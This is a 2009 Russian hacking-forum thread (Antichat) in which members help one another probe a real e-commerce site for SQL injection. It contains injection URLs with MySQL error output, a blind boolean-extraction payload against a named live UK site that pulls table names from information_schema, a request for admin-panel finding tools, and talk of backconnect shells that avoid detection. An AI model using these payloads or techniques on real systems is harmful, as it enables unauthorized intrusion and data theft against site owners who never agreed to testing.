HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.09.2009, 16:25
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами: 9100556

Репутация: 912
По умолчанию

Цитата:
Сообщение от XXXXXX  
Привет всем. какие есть способы найти админку сайта? есть ли праги или скрипты для этого? ну короче чё делать если стандартные типа /admin/index.php или /admin.php неподходят.
Ну или хотя бы список возможных путей в админку.

_http://security-digger.org/ , _http://forum.antichat.ru/thread40031.html
 
Ответить с цитированием

  #2  
Старый 28.09.2009, 17:13
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами: 9030566

Репутация: 2017


По умолчанию

Такс вопрос

при '

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 3.51 Driver][mysqld-5.0.37-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1

/prod-detail.asp, line 26

вопрос как реализовывать дальше =\ копать как MSSQL? or MySQL?


Цитата:
http://wk/prod-detail.asp?ProductID=4429+or+0=(select%20id1)#
выдает

Цитата:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [MySQL][ODBC 3.51 Driver][mysqld-5.0.37-community-nt]Unknown column 'id1' in 'field list' /prod-detail.asp, line 26
при
Цитата:
http://wk/prod-detail.asp?ProductID=4429+or+0=(select%20id)#
страница отображается

Последний раз редактировалось HAXTA4OK; 28.09.2009 в 17:19..
 
Ответить с цитированием

  #3  
Старый 28.09.2009, 17:15
wolmer
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
С нами: 8947056

Репутация: 229
По умолчанию

Цитата:
Сообщение от HAXTA4OK  
Такс вопрос

при '

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 3.51 Driver][mysqld-5.0.37-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1

/prod-detail.asp, line 26

вопрос как реализовывать дальше =\ копать как MSSQL? or MySQL?
Я бы покопал в сторону Mysql

(хотя ошибка многое говорит (как ты уже знаешь если такая ошибка то значит не правильно работаем с Mysql))

Последний раз редактировалось wolmer; 28.09.2009 в 17:18..
 
Ответить с цитированием

  #4  
Старый 28.09.2009, 17:29
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами: 9030566

Репутация: 2017


По умолчанию

MySQL говориш

http://wk/prod-detail.asp?ProductID=4429+and+b=system_user()

Цитата:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [MySQL][ODBC 3.51 Driver][mysqld-5.0.37-community-nt]Unknown column 'b' in 'where clause' /prod-detail.asp, line 26
http://wk/prod-detail.asp?ProductID=4429+and+b=@@system_user

Цитата:
Microsoft OLE DB Provider for ODBC Drivers error '80040e31' [MySQL][ODBC 3.51 Driver][mysqld-5.0.37-community-nt]Unknown system variable 'system_user' /prod-detail.asp, line 26
 
Ответить с цитированием

  #5  
Старый 28.09.2009, 17:34
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

Знаешь, не везде есть такие вещи.
Например @@basedir не везде работает.
Где то почему то поразному.
 
Ответить с цитированием

  #6  
Старый 28.09.2009, 17:55
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами: 11020706

Репутация: 4693


По умолчанию

HAXTA4OK, выведи version() и верь тому что там написано.

З.Ы.
А вообще это MySQL
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.

Последний раз редактировалось Qwazar; 28.09.2009 в 18:12..
 
Ответить с цитированием

  #7  
Старый 28.09.2009, 18:49
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами: 9030566

Репутация: 2017


По умолчанию

пилин понять не могу

почему тогда пишет

http://wk/prod-detail.asp?ProductID=4429+and+id1

Цитата:
Microsoft OLE DB Provider for ODBC Drivers error '80040e31' [MySQL][ODBC 3.51 Driver][mysqld-5.0.37-community-nt]The used SELECT statements have a different number of columns /prod-detail.asp, line 26
а при http://wk/prod-detail.asp?ProductID=4429+and+id

все нормально страница грузится

ЗЫ mySQL нашел другую просто и провел ее..но все равно в задумках

Последний раз редактировалось HAXTA4OK; 28.09.2009 в 18:59..
 
Ответить с цитированием

  #8  
Старый 28.09.2009, 19:40
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами: 9780227

Репутация: 1423
По умолчанию

HAXTA4OK, давай ссылку. Для телепатии недостаточно маны

http://www.edu-play.co.uk/prod-detail.asp?ProductID=4204+and+1=if(ascii(substring ((select+table_name+from+information_schema.tables +limit+0,1),1,1))>1,1,0)

Оно ?
 
Ответить с цитированием

  #9  
Старый 28.09.2009, 20:01
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами: 9030566

Репутация: 2017


По умолчанию

не оно, SQL-inj нашел другую ..так что =) всем спс {/offtop]
 
Ответить с цитированием

  #10  
Старый 28.09.2009, 20:33
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами: 9594385

Репутация: 386
По умолчанию

Update - вопрос остался без ответа
Цитата:
Бэкконект, как вариант (если я правильно тебя понял)...
Ну не, это немного нето. Небудуж я его каждый раз запускать, палево млин. Мож кто нает как например разрешить конект на определенный порт? ибо например когда пингую говорит что сервер офф а из веба его видно.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 7 (пользователей: 0 , гостей: 7)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.